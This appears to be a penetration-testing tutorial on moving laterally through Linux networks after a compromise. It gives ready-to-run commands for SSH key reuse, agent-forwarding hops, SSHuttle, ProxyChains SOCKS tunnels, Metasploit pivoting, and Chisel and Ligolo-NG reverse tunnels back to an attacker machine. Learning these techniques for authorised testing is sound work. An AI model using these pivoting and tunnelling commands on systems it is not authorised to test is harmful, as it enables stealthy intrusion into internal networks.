Linux Lateral Movement for Pentesters
Once you’ve compromised a Linux system, lateral movement allows you to pivot across the internal network, access new machines, and expand your foothold. This guide focuses on the essential tools and techniques used to move laterally in Linux environments during a penetration test.
What Is Lateral Movement?
Lateral movement in Linux means using the access you’ve gained to reach other Linux systems on the same network — either by leveraging credentials, exploiting trust relationships, or tunneling traffic to otherwise unreachable hosts.
Prerequisites
- Valid SSH credentials or private keys
- Network access to target systems (direct or via pivot)
- Open ports on target systems (usually 22, but others possible)
- Tools set up on your attacking box (or target box) — e.g., ProxyChains, Metasploit, SSHuttle, Chisel
Lateral Movement Techniques & Tools
Here are the main tools and methods used for Linux lateral movement:
1. SSH (Direct Login)
If you have valid credentials or a private key, use SSH to log into another machine:
ssh user@10.10.10.20
With a private key:
ssh -i id_rsa user@10.10.10.20
You can also attempt key reuse if the private key found belongs to another user on the network.
2. SSH Agent Forwarding
If SSH agent forwarding is enabled, and you compromise a machine where a user is logged in via SSH, you may be able to hop further without touching private keys.
ssh -A user@target-host
Check if an agent is running:
echo $SSH_AUTH_SOCK
Then try jumping to another host from that machine.
3. SSHuttle (VPN-like Access)
SSHuttle creates a VPN-like tunnel via SSH, allowing full TCP access to internal hosts through a compromised Linux system.
sshuttle -r user@10.10.10.10 10.10.20.0/24
You can now scan and interact with 10.10.20.x hosts as if they were on your local network.
4. ProxyChains + SSH Dynamic Port Forwarding
Set up a SOCKS proxy via SSH:
ssh -D 1080 user@10.10.10.10
Then configure proxychains4:
socks5 127.0.0.1 1080
Now, use any tool through the tunnel:
proxychains4 nmap -sT -Pn -p22 10.10.20.10
proxychains4 ssh user@10.10.20.10
This works great with Impacket, enum tools, or even browsers (via FoxyProxy).
5. Metasploit Pivoting with autoroute + SOCKS
If you have a Meterpreter session on a Linux box:
- Add route:
run autoroute -s 10.10.20.0/24
- Start the SOCKS proxy:
use auxiliary/server/socks_proxy
set SRVPORT 1080
run
- Use ProxyChains with tools like:
proxychains4 ssh user@10.10.20.5
This lets you pivot to other Linux systems inside that subnet.
6. Chisel (TCP Tunneling)
If you can upload a binary, Chisel lets you tunnel traffic through firewalled networks using a client-server SOCKS setup.
On your Kali (attacker):
chisel server -p 8000 --reverse
On the target (victim):
./chisel client <kali-ip>:8000 R:1080:socks
Now you’ve got a SOCKS proxy at 127.0.0.1:1080 — combine it with ProxyChains.
7. Ligolo-NG (Interactive Proxy/Pivot Framework)
Ligolo-NG is like Chisel but better integrated and supports automatic traffic routing via tun interfaces.
Setup steps:
- Upload agent to target
- Start relay on your Kali
- Connect tunnel
- Add route to internal subnet
- Start scanning/pivoting
Great for OPSEC-sensitive lateral movement with encrypted channels.
8. SSocks / Plink / Other Tunnels
Other options for SOCKS proxying include:
ssocks(simple SOCKS5 server for Linux pivoting)plink(PuTTY’s CLI for Windows, also works in some Linux setups)socat(versatile but complex)- Custom reverse tunnels:
ssh -R 2222:localhost:22 attacker@yourhost.com
Used when you’re working with restrictions or need creative pivot setups.
Summary of Tools and When to Use Them
| Tool | Technique | Use Case |
|---|---|---|
| SSH | Direct login | Creds or keys to remote host |
| SSHuttle | VPN-like access | Full subnet access via single jump |
| ProxyChains | SOCKS proxy routing | Use tools through tunnels |
| SSH -D | Dynamic port forwarding | Set up SOCKS via SSH |
| Metasploit | autoroute + socks_proxy | Pivot and tunnel to other machines |
| Chisel | Reverse tunnel | Bypass firewalls, create SOCKS tunnel |
| Ligolo-NG | Tun-based proxying | Advanced pivoting, stealthy movement |
| SSH agent | Reuse live SSH agents | Jump to other hosts as logged-in user |
Final Thoughts
Lateral movement on Linux requires creativity. You’ll often face limited visibility, locked-down environments, or segmented networks. Your job is to combine these tools to craft a working pivot path — quietly and efficiently.
Focus on these fundamentals, and you’ll always have a way forward.